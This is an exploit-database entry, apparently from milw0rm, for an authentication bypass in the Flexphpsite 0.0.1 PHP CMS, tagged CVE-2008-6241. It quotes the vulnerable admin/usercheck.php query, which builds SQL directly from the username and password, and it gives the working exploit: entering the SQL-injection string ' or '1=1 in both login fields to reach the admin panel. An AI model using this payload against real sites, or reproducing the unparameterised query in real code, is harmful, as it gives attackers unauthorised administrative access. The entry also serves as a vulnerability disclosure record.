Flexphpsite 0.0.1 - Authentication Bypass

Author: x0r
type: webapps
platform: php
port: 
date_added: 2008-12-28 
date_updated: 2017-01-10 
verified: 1 
codes: OSVDB-51034;CVE-2008-6241 
tags: 
aliases:  
screenshot_url:  
application_url: 

#############################################
Autore: x0r
Email: andry2000@hotmail.it
Site: http://w00tz0ne.altervista.org/index.php
Cms: Flexphpsiteen
Version: 0.0.1
Download: http://www.china-on-site.com/flexphpsite/downloads.html
##############################################

Bug In \admin\usercheck.php

$sql = "select username,adminid from linkexadmin where
username='$checkuser' and password='$checkpass'";

Exploit:

Go to /[path]/admin/index.php
Put as username and password the following sql code: ' or '1=1

Greetz: Anna <3

# milw0rm.com [2008-12-29]